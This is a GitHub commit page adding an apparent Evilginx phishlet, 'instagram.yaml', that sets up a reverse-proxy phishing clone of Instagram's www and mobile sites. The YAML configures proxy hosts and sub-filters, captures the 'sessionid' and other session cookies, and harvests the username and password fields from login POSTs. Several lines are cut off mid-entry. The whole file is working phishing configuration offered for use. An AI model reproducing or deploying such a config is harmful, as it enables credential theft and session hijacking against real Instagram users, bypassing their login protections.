Skip to content

Commit

Permalink
Create instagram.yaml
Browse files Browse the repository at this point in the history
Instagram Phishlet
  • Loading branch information
princenasario authored Jan 3, 2019
1 parent 71dd650 commit a9fac51
Showing 1 changed file with 19 additions and 0 deletions.
19 changes: 19 additions & 0 deletions phishlets/instagram.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
author: '@prrrrinncee'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true,$
- {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_$
sub_filters:
- {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com'$
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', se$
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', se$
auth_tokens:
- domain: '.instagram.com'
keys: ['sessionid','.*,regexp']
credentials:
username:
key: 'user'
search: '(.*)'
type: 'post'
password:
key: 'pass'

0 comments on commit a9fac51

Please sign in to comment.